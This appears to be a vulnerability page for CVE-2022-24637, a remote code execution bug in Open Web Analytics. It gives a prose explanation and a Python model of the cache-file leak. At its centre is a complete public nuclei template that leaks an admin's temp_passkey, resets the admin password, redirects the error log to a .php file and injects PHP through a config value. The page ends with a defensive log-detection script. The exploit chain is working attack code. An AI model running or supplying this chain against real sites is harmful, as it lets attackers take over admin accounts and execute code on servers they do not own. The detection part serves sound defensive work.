Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter: the cache file header was built from a single-quoted PHP string, so the \n after <?php was written as a literal backslash and n rather than a newline. PHP only recognises <?php as an open tag when whitespace follows it, so a cache file under owa-data/caches/ is served to the client as plain text, exposing the base64-encoded serialized user object, including the temp_passkey that the password-change form accepts as owa_k. Once the admin password has been reset with that key, the attacker can log in, point base.error_log_file at a .php path under owa-data/caches/ and get PHP written into that file through a config value that is echoed into the debug log, which is the remote code execution step.
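As an added example (not code from the page's PoC, from OWA or from the nuclei project), the Python below models why the single-quote bug leaks the user object and then does what the template's regex extractor and JavaScript step do: it unwraps the '<?php\n/* ... */\n?>' body, base64-decodes it and pulls out the 32-hex temp_passkey. The serialized user object is a constructed sample, and as_served_by_php() is a deliberately simplified model of PHP's open-tag rule (it assumes short_open_tag is off), not the PHP lexer.

```python
import base64
import re

# Constructed sample of a serialized user object; the real OWA object carries
# more properties, but the leak only needs the string following "temp_passkey".
CONSTRUCTED_USER_OBJECT = (
    'a:4:{s:7:"user_id";s:5:"admin";s:5:"email";s:17:"admin@example.org";'
    's:12:"temp_passkey";s:32:"0123456789abcdef0123456789abcdef";'
    's:4:"role";s:5:"admin";}'
)


def vulnerable_cache_file(serialized: str) -> str:
    """File body as written before 1.7.4: the header came from a single-quoted
    PHP string, so '\\n' is the two characters backslash and n, not a newline."""
    b64 = base64.b64encode(serialized.encode()).decode()
    return "<?php\\n/*" + b64 + "*/\\n?>"


def fixed_cache_file(serialized: str) -> str:
    """File body with the intended double-quoted header: real newlines."""
    b64 = base64.b64encode(serialized.encode()).decode()
    return "<?php\n/*" + b64 + "*/\n?>"


def as_served_by_php(file_contents: str) -> str:
    """Simplified model (an assumption made for this example, not the PHP
    lexer) of what an HTTP client receives when the cache file is requested
    directly.  PHP recognises '<?php' as an open tag only when whitespace
    follows it; with short_open_tag off, anything else is sent to the client
    as plain text.  When the tag is recognised, the file is only a comment,
    so nothing is sent."""
    if re.match(r"<\?php[ \t\r\n]", file_contents):
        return ""
    return file_contents


# Same shape as the template's extractor, but with the full base64 alphabet.
LEAK_RE = re.compile(r"<\?php\\n/\*([A-Za-z0-9+/=]+)\*/\\n\?>")
# The serialized 32-character string value that follows the temp_passkey key.
PASSKEY_RE = re.compile(r'"temp_passkey";s:32:"([a-f0-9]{32})"')


def extract_temp_passkey(body: str):
    """Return the leaked temp_passkey from a served cache file, or None when
    the body is not a plain-text cache dump (e.g. a patched install)."""
    m = LEAK_RE.search(body)
    if not m:
        return None
    serialized = base64.b64decode(m.group(1)).decode("utf-8", "replace")
    k = PASSKEY_RE.search(serialized)
    return k.group(1) if k else None


if __name__ == "__main__":
    leaked = as_served_by_php(vulnerable_cache_file(CONSTRUCTED_USER_OBJECT))
    print("vulnerable install leaks:", extract_temp_passkey(leaked))
    patched = as_served_by_php(fixed_cache_file(CONSTRUCTED_USER_OBJECT))
    print("patched install leaks:", extract_temp_passkey(patched))
```

One caveat when reusing the template's own extractor regex: its character class [A-Za-z0-9=] omits + and /, so a user object whose base64 encoding contains either character will not match and the template reports nothing; LEAK_RE above uses the full alphabet for that reason.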
PoC code [public]
id: CVE-2022-24637

info:
  name: Open Web Analytics 1.7.3 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
  impact: |
    Unauthenticated attackers can exploit improperly handled PHP files to obtain cache hashes containing sensitive user information, then leverage these to reset the admin password and upload malicious files for remote code execution, compromising the entire analytics platform.
  remediation: |
    Upgrade to Open Web Analytics version 1.7.4 or later that properly handles PHP file generation and validates authentication for sensitive operations.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/open_web_analytics_rce.rb
    - http://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
    - https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4
    - https://github.com/Pflegusch/CVE-2022-24637
    - https://github.com/c0derpwner/HTB-pwned
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24637
    cwe-id: CWE-269
    epss-score: 0.93978
    epss-percentile: 0.9988
    cpe: cpe:2.3:a:openwebanalytics:open_web_analytics:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: openwebanalytics
    product: open_web_analytics
    shodan-query: cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"
  tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics,vuln

variables:
  password: "{{randbase(8)}}@123!"
  secret: "{{randstr}}"
  secret_b64: "{{base64(secret)}}"

flow: |
  http(1);
  http(2);
  javascript();
  http(3);
  http(4); http(5); http(6); http(7);

javascript:
  - code: |
      idx=serobj.indexOf('temp_passkey');
      passubstr=serobj.substring(idx,idx+120);
      temp_pass=(passubstr.match(/s:32:"([a-f0-9]{32})"/)[1])
      temp_pass
    args:
      serobj: "{{base64_decode(serializedobj)}}"

http:
  - raw:
      - |
        POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        owa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login

    matchers:
      - type: word
        part: body
        words:
          - "Login Failed"
        internal: true

  - raw:
      - |
        GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: serializedobj
        internal: true
        regex:
          - '<\?php\\n\/\*([A-Za-z0-9=]+)\*\/\\n\?>'

    matchers:
      - type: word
        part: body
        words:
          - <?php\n
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        owa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password

    matchers:
      - type: dsl
        dsl:
          - "contains(location,'owa_status_code=3006')"
          - "status_code==302"
        internal: true
        condition: and

  - raw:
      - |
        POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        owa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login

    matchers:
      - type: dsl
        dsl:
          - "contains(set_cookie,'owa_p')"
          - "status_code==302"
        internal: true
        condition: and

  - raw:
      - |
        GET /index.php?owa_do=base.optionsGeneral HTTP/1.1
        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: nonce
        internal: true
        regex:
          - 'name="owa_nonce" value="([a-z0-9]+)">'

  - raw:
      - |
        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
        Host: {{Hostname}}
        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
        Content-Type: application/x-www-form-urlencoded

        owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2

  - raw:
      - |
        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
        Host: {{Hostname}}
        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
        Content-Type: application/x-www-form-urlencoded

        owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>

      - |
        GET /owa-data/caches/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '[debug_log]'
          - "{{secret}}"
        condition: and
# digest: 4b0a00483046022100e2bd6933ab5e03bc4e4163c0523af3a70e8353cce4d8cdb2b91b73aac7f65e57022100c94e3ee3bd1773ccb87a1af6001afa796749bb4e5d7301b813ac635984903698:922c64590222798bb761d5b6d8e72950
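A defender-side counterpart to the chain in the template above (direct read of the user cache object, password reset, options update that points base.error_log_file under owa-data/caches/, fetch of the written .php), as an added example that is not part of the template, of OWA or of the nuclei project: it walks combined-format web server access-log lines and flags the request patterns that are visible server-side. The POST bodies (owa_k, owa_config[...]) never reach the access log, so the rules lean on paths, status codes and response sizes. The log lines are constructed for this example, the client addresses are documentation ranges, and the rule names are this example's own.

```python
import re
from collections import defaultdict

# Constructed combined-format lines (Apache/nginx style), not from any real host.
CONSTRUCTED_ACCESS_LOG = """\
203.0.113.7 - - [10/Mar/2023:12:00:01 +0000] "POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2023:12:00:02 +0000] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 200 1849 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2023:12:00:03 +0000] "POST / HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2023:12:00:06 +0000] "POST /index.php?owa_do=base.optionsGeneral HTTP/1.1" 302 0 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2023:12:00:07 +0000] "GET /owa-data/caches/qmXlzeKsVCjd.php HTTP/1.1" 200 221 "-" "curl/8.0"
198.51.100.20 - - [10/Mar/2023:12:05:00 +0000] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2023:12:05:01 +0000] "GET /index.php?owa_do=base.reportDashboard HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Per-user cache object fetched directly over HTTP: the information-disclosure step.
USER_CACHE_RE = re.compile(r"^/owa-data/caches/\d+/owa_user/[0-9a-f]{32}\.php$")
# A .php file directly under owa-data/caches/: where the chain points error_log_file.
CACHES_PHP_RE = re.compile(r"^/owa-data/caches/[^/]+\.php$")
# Settings update; normal for a real admin, so only used as a correlation signal.
OPTIONS_RE = re.compile(r"^/index\.php\?owa_do=base\.optionsGeneral")


def parse_line(line):
    """Split one combined-format line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["bytes"] = 0 if entry["bytes"] == "-" else int(entry["bytes"])
    return entry


def classify(entry):
    """Return the rule name an entry trips, or None."""
    method, path = entry["method"], entry["path"]
    status, size = entry["status"], entry["bytes"]
    if method == "GET" and USER_CACHE_RE.match(path) and status == 200:
        # A fixed install executes the cache file and returns an empty body; a
        # non-empty 200 means the base64-wrapped object was served as plain text.
        return "owa_cache_leak" if size > 0 else "owa_cache_probe"
    if method == "GET" and CACHES_PHP_RE.match(path) and status == 200 and size > 0:
        return "owa_caches_php_fetch"
    if method == "POST" and OPTIONS_RE.match(path):
        return "owa_options_update"
    return None


def detect(log_text):
    """Map client IP -> ordered list of rules tripped, skipping unparseable lines."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        rule = classify(entry)
        if rule:
            findings[entry["ip"]].append(rule)
    return dict(findings)


def chain_suspects(findings):
    """IPs whose rules contain leak -> options update -> caches .php fetch, in that order."""
    order = ["owa_cache_leak", "owa_options_update", "owa_caches_php_fetch"]
    suspects = []
    for ip, rules in findings.items():
        pos = 0
        for rule in rules:
            if pos < len(order) and rule == order[pos]:
                pos += 1
        if pos == len(order):
            suspects.append(ip)
    return suspects


if __name__ == "__main__":
    found = detect(CONSTRUCTED_ACCESS_LOG)
    for ip, rules in found.items():
        print(ip, rules)
    print("full chain:", chain_suspects(found))
```

A zero-byte 200 on the owa_user cache path (the second client above) is what a fixed install returns, so it is reported only as a probe; any 200 with a body on that path, or on a .php directly under owa-data/caches/, deserves a look on its own, because nothing in normal OWA use requests those files from a browser.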